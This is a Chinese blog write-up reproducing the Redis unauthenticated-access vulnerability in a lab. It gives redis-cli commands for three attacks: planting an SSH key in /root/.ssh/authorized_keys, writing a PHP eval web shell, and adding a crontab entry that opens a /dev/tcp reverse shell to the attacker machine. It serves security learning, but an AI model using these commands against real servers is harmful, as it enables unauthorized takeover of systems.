Redis未授权访问漏洞总结

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量816 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AzVoidSUN/article/details/111212606
版权

一.漏洞描述
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器。
漏洞的产生条件有以下两点:

(1) Redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网

(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务
二. 漏洞危害
Redis 2.x,3.x,4.x,5.x
三. 环境搭建
1.环境搭建
这里我使用的是Ubuntu的虚拟机,首先使用
wget http://download.redis.io/releases/redis-4.0.10.tar.gz
在这里插入图片描述
然后解压,进入源码目录,然后编译(make、make install)
tar -zxf redis-4.0.10.tar.gz
在这里插入图片描述
make结束后,进入src目录:cd src,
将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
在这里插入图片描述
返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下:
在这里插入图片描述
然后启动,最好使用sudo 启动,可以在后面避免一个错误。
在这里插入图片描述
kali
kali安装安装redis客户端(redis-cli)
wget http://download.redis.io/releases/redis-4.0.10.tar.gz
解压,编译
四.利用方式
Ubuntu靶机 192.168.150.133
kali 攻击机 192.168.150.131

第一种利用方式
通过写入SSH公钥实现SSH登录
1.ssh-keygen -t rsa 在这里插入图片描述
2.将公钥写入key.txt文件(前后用\n换行,避免和redis里其他缓存数据混合)。
(echo -e “\n”;cat id_rsa.pub;echo -e “\n”)>key.txt
在这里插入图片描述
3.再把key.txt文件内容写入redis缓冲

cat /root/.ssh/key.txt |./redis-cli -h 192.168.10.139 -x set pub
在这里插入图片描述
4.设置redis的dump文件路径为/root/.ssh且文件名为authorized_keys
在这里插入图片描述在这里插入图片描述

5.ssh连接
在这里插入图片描述

第二种方式
写入webshell’
首先开启web服务
python3 -m http.server
在这里插入图片描述
然后在kali下
config set dir /var
config set dbfilename 1.php
set webshell “<?php phpinfo(); ?>” 或者set one “\n\n\n<?php @eval($_POST['c']);?>\n\n\n”
save

在这里插入图片描述
看下Ubuntu

第三种利用方式
在crontab里写定时任务,反弹shell
kali开启端口监听

set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.150.131/4444 0>&1\n\n”
config set dir /var/
config set dbfilename root
save
在这里插入图片描述
过一分钟左右就可以收到shell

大碗宽面大又圆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis 漏洞总结
qq_41696518的博客
06-26 2994
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
redis授权访问漏洞
jiji_king的博客
07-07 1万+
个人笔记
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 916
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
Redis系列漏洞总结
NLost
10-21 6261
授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
Redis授权访问漏洞
Forget_liu的博客
04-05 670
​ 传统数据库都是持久化存储到硬盘中,所以执行某些业务时传统数据库并不是很理想。redis等数据存储在内存中的数据库就应允而生了。基于内存的Redis读速度是110000次/s,写速度是81000次/s。但是基于内存的缺点就是断电即失,如果服务器产生了意外,内存中的数据就会全部丢失,企业使用redis就冒着很大的风险。所以redis支持持久化存储(rbd与aof),在满足一定条件的情况下会自动保存到硬盘或者通过命令手动保存到硬盘。
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 2833
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
redis面试题之运维监控.zip
04-18
2. **安全策略**:设置访问控制,限制非授权访问;定期更新版本,修复已知安全漏洞。 3. **容量规划**:根据业务增长预测,合理预估Redis的内存和CPU需求。 4. **监控报警**:设置合理的阈值,一旦超出范围立即...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
在WEB或本地环境中,攻击者可能会尝试探查数据库应用,寻找授权访问的途径。对于数据库提权,关键在于获取最高权限用户的密码。例如,Redis和PostgreSQL这两个数据库系统就曾被发现存在提权漏洞Redis是一个...
强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,m.zip
03-07
在渗透测试中,Yasso 可能会帮助测试者检测 Postgres 服务的漏洞,包括弱口令、授权访问、SQL注入等。 6. **Yasso-master**: 这个文件名暗示 Yasso 是一个主项目或主分支,可能包含 Yasso 工具的源代码、配置...
065-NoSql数据库之漏洞利用方法总结.pdf
09-20
1. 快速读写:例如Redis,因其简单的逻辑和纯内存操作,能实现超过10万次每秒的读写操作。 2. 方便扩展:NoSQL数据库去除了关系型数据库的关系特性,易于进行横向扩展,避免了垂直扩展带来的局限性。 3. 低廉成本:...
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1448
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
redis授权访问漏洞
weixin_43995159的博客
11-29 1205
复现了三种redis授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
漏洞复现】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1239
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
一文了解 Redis 授权访问漏洞
闵行小鱼塘
05-17 1019
学习有名的 Redis 授权访问漏洞
漏洞测试
01-12 640
漏洞测试漏洞测试漏洞测试漏洞测试
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
如何通过redis授权访问漏洞反弹shell
qq_42671480的博客
05-20 1452
如何通过redis授权访问漏洞反弹shell 1.搭建redis服务器和客户端 我用centos作为靶机,用kali作为攻击方来进行实验。 下载,解压,编译: $ wget http://download.redis.io/releases/redis-4.0.10.tar.gz $ tar xzf redis-4.0.10.tar.gz $ mv redis-4.0.10 /usr/loc...
redis学习杂记
weixin_48664996的博客
07-28 405
Redis 了解redis redis是一种开源、使用c语言编写的、支持网络交互的,可基于内存也可以持久化的Key-Value数据库。 数据结构 Redis使用的数据结构如下:String、list、集合、有序集合、哈希,对于key的使用不应太长(尽量不要超过1024字节),造成消耗过多的内存,影响查找的效率,也不应过短影响key的可读性,对key应有统一的格式。 在使用string时,如果遇到数值操作,redis会将字符串类型转换为数值。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值